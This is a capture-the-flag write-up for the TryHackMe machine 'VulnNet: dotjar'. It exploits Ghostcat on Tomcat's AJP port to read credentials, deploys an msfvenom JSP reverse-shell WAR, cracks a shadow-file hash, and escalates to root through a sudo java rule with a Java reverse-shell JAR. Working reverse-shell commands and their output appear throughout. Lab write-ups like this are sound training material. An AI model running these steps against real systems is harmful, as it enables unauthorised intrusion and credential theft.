VulnNet: dotjar

This is VulnNet: dotjar from THM. It’s medium rated, and says:

A new machine means a new web implementation. Foothold should be rather easy-going as long as you connect the dots. Privilege escalation might depend on your Java knowledge, don’t worry though, I’m rather a person who avoids Java and I still had a lot of fun working on this machine.


8009 and 8080 only. Port 8009 is Apache Jserv (Protocol v1.3); this will be important.


We have Apache Tomcat, which I’ve seen in several CTFs now and usually with default credentials. However, that isn’t the case today - I tried a few; nothing. Now what?


Apache Jserv (Protocol v1.3) is vulnerable to the Ghostcat LFI vulnerability, which is also explained here. There is an exploit on github, and we can use it as the Medium blog describes, firstly to read WEB-INF, and then:

└─# python3 8009 /WEB-INF/web.xml read
# stuff, removed
     VulnNet Dev Regulations - mandatory
1. Every VulnNet Entertainment dev is obligated to follow the rules described herein according to the contract you signed.
2. Every web application you develop and its source code stays here and is not subject to unauthorized self-publication.
-- Your work will be reviewed by our web experts and depending on the results and the company needs a process of implementation might start.
-- Your project scope is written in the contract.
3. Developer access is granted with the credentials provided below:
GUI access is disabled for security reasons.
4. All further instructions are delivered to your business mail address.
5. If you have any additional questions contact our staff help branch.
# stuff, removed

With our credentials, we can log in - but notice the line above:

GUI access is disabled for security reasons.

So it’s CLI all the way.

Generate a payload with MSFVENOM

└─# msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT=1234 -f war > shell.war
Payload size: 1087 bytes
Final size of war file: 1087 bytes

And send it up the line:

└─# curl -v -u 'REDACTED' --upload-file shell.war ""
*   Trying
* Connected to ( port 8080 (#0)
* Server auth using Basic with user 'webdev'
> PUT /manager/text/deploy?path=/hack&update=true HTTP/1.1
> Host:
> Authorization: Basic CREDS:REDACTED==
> User-Agent: curl/7.74.0
> Accept: */*
> Content-Length: 1087
> Expect: 100-continue
* Mark bundle as not supporting multiuse
< HTTP/1.1 100 
* We are completely uploaded and fine
* Mark bundle as not supporting multiuse
< HTTP/1.1 200 
< Cache-Control: private
< Expires: Thu, 01 Jan 1970 00:00:00 GMT
< X-Content-Type-Options: nosniff
< Content-Type: text/plain;charset=utf-8
< Transfer-Encoding: chunked
< Date: Sat, 24 Apr 2021 10:44:52 GMT
OK - Deployed application at context path [/hack]
* Connection #0 to host left intact

Start a listener and visit in the browser (or curl I guess):

└─# nc -nvlp 1234                                              
listening on [any] 1234 ...
connect to [] from (UNKNOWN) [] 60308
uid=1001(web) gid=1001(web) groups=1001(web)

Boom, we’re on.


It takes some enumeration, but we find a hash for our next user:

web@vulnnet-dotjar:/dev/shm$ gunzip shadow-backup-alt.gz # where did it come from? find it yourself lol
web@vulnnet-dotjar:/dev/shm$ ls
web@vulnnet-dotjar:/dev/shm$ ls -lash
ls -lash
total 376K
   0 drwxrwxrwt  2 root root  100 Apr 24 13:41 .
   0 drwxr-xr-x 17 root root 3.7K Apr 24 12:22 ..
4.0K -rw-r-----  1 web  web  1.2K Apr 24 13:41 shadow-backup-alt
web@vulnnet-dotjar:/dev/shm$ file sh
file shadow-backup-alt 
shadow-backup-alt: ASCII text
web@vulnnet-dotjar:/dev/shm$ cat sh
cat shadow-backup-alt 
# other hashes, you get the idea

From this there is a hash you can crack with John, and su to jdk-admin.


jdk-admin@vulnnet-dotjar:/dev/shm$ sudo -l
sudo -l
Password: REDACTED

Matching Defaults entries for jdk-admin on vulnnet-dotjar:
    env_reset, mail_badpass,

User jdk-admin may run the following commands on vulnnet-dotjar:
    (root) /usr/bin/java -jar *.jar

Okay so we need an executable JAR file to run; I want one to give me a reverse shell. I get it from here, but it’s for Windows. Nevermind, just change this:

Process p = new ProcessBuilder(“C:\Windows\System32\cmd.exe”).redirectErrorStream(true).start();

to this:

Process p = new ProcessBuilder(“/bin/sh”).redirectErrorStream(true).start();

We need to compile it and turn it into an executable JAR:

└─# javac --release 8                                                   
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true

└─# jar cmf connectback.jar connectback.class
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true

Note I had a newer JDK than the box and it wouldn’t work, hence the –release 8 option. Upload the file and run it (yeah, it took me a few goes):

jdk-admin@vulnnet-dotjar:/dev/shm$ !16 && !18
!16 && !18
rm connectback.jar  && wget && sudo -u root /usr/bin/java -jar connectback.jar
--2021-04-24 14:09:34--
Connecting to connected.
HTTP request sent, awaiting response... 200 OK
Length: 1887 (1.8K) [application/java-archive]
Saving to: ‘connectback.jar’

connectback.jar     100%[===================>]   1.84K  --.-KB/s    in 0.001s  

2021-04-24 14:09:34 (2.20 MB/s) - ‘connectback.jar’ saved [1887/1887]

And in another listener:

└─# nc -nvlp 9999        
listening on [any] 9999 ...
connect to [] from (UNKNOWN) [] 51976
uid=0(root) gid=0(root) groups=0(root)
Sat Apr 24 14:10:00 CEST 2021

Thanks to TheCyb3rW0lf.